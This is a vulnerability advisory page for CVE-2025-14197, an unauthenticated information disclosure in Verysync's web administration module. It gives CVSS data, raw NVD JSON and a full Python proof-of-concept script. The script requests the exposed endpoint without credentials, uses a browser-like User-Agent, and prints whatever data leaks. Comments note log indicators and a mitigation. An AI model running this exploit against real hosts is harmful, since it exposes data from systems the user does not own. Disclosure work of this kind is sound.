Security Vulnerability Report
CVE-2025-14197 CVSS 5.3 MEDIUM

CVE-2025-14197

Published: 2025-12-07 16:15:47
Last Modified: 2026-04-15 00:35:42

Description

A security vulnerability has been detected in Verysync 微力同步 up to 2.21.3. The impacted element is an unknown function of the file /rest/f/api/resources/f96956469e7be39d of the component Web Administration Module. Such manipulation leads to information disclosure. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Verysync 微力同步 <= 2.21.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
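# CVE-2025-14197 PoC - Verysync Information Disclosure
# Target: Verysync Web Administration Module
# Endpoint: /rest/f/api/resources/f96956469e7be39d
#
# Review notes for defenders: the script sends exactly one unauthenticated
# HTTP GET to the endpoint above, so the log indicator is a request for that
# path with no session -- not the User-Agent, which is set to look like a
# browser. The affected range given on this page is Verysync <= 2.21.3 and
# no vendor fix is recorded here, so the practical mitigation is to keep the
# Web Administration Module unreachable from untrusted networks.
import json
import sys

import requests


def check_verysync_version(target_ip, port=8886):
    """Return True if the Verysync web interface answers an HTTP GET.

    Despite the name this is a reachability probe only: nothing in the
    response is parsed and no version information is read.

    Args:
        target_ip: host name or IP address of the Verysync instance.
        port: TCP port of the web interface (defaults to 8886).

    Returns:
        True when the root URL returns any HTTP response, False when the
        connection fails (timeout, refused, DNS error, ...).
    """
    url = f"http://{target_ip}:{port}"
    try:
        # First check if the web interface is accessible
        response = requests.get(url, timeout=5)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")
        return False
    print(f"[*] Verysync Web Interface Status: {response.status_code}")
    return True


def exploit_information_disclosure(target_ip, port=8886):
    """Request the vulnerable endpoint without credentials and print the reply.

    Args:
        target_ip: host name or IP address of the Verysync instance.
        port: TCP port of the web interface (defaults to 8886).

    Returns:
        True when the endpoint answered HTTP 200, False on any other status
        code or on a transport error.
    """
    # The vulnerable endpoint
    endpoint = "/rest/f/api/resources/f96956469e7be39d"
    url = f"http://{target_ip}:{port}{endpoint}"
    print(f"[*] Target: {url}")
    print("[*] Attempting to exploit CVE-2025-14197...")

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'en-US,en;q=0.9',
        'Connection': 'close'
    }
    try:
        # Send unauthenticated request to the vulnerable endpoint
        response = requests.get(url, headers=headers, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

    print(f"[*] Response Status Code: {response.status_code}")
    print(f"[*] Response Headers: {dict(response.headers)}")
    print(f"[*] Response Body Length: {len(response.text)}")

    # NOTE(review): a 200 on its own is a weak signal -- a login page, a
    # reverse proxy or a WAF can also answer 200. Read the printed body
    # before treating the host as vulnerable.
    if response.status_code != 200:
        print(f"[-] Endpoint returned status {response.status_code}")
        return False

    print("[+] VULNERABLE! Information disclosure endpoint accessible without authentication")
    print(f"\n[+] Leaked Information:\n{response.text}")
    # Try to extract and display structured data. A non-JSON body raises
    # ValueError (requests' JSONDecodeError subclasses it); that is the only
    # failure the raw-text fallback is meant to cover, so the previous bare
    # `except:` -- which also swallowed KeyboardInterrupt -- is narrowed.
    try:
        data = response.json()
    except ValueError:
        print("\n[+] Raw Response:")
        print(response.text)
    else:
        print("\n[+] Parsed JSON Response:")
        print(json.dumps(data, indent=2, ensure_ascii=False))
    return True


def main():
    """Command-line entry point: ``cve-2025-14197.py <target_ip> [port]``."""
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14197.py <target_ip> [port]")
        print("Example: python cve-2025-14197.py 192.168.1.100 8886")
        sys.exit(1)

    target_ip = sys.argv[1]
    try:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 8886
    except ValueError:
        # A non-numeric port used to escape as an uncaught traceback.
        print(f"[-] Invalid port: {sys.argv[2]!r}")
        sys.exit(1)

    print("=" * 60)
    print("CVE-2025-14197 - Verysync Information Disclosure Exploit")
    print("=" * 60)

    # Check if target is alive
    if check_verysync_version(target_ip, port):
        # Attempt exploitation
        exploit_information_disclosure(target_ip, port)


if __name__ == "__main__":
    main()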

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14197", "sourceIdentifier": "[email protected]", "published": "2025-12-07T16:15:47.297", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Verysync 微力同步 up to 2.21.3. The impacted element is an unknown function of the file /rest/f/api/resources/f96956469e7be39d of the component Web Administration Module. Such manipulation leads to information disclosure. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/jjjjj-zr/jjjjjzr/issues/6", "source": "[email protected]"}, {"url": "https://github.com/jjjjj-zr/jjjjjzr/issues/8", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334617", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334617", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.699498", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.699537", "source": "[email protected]"}]}}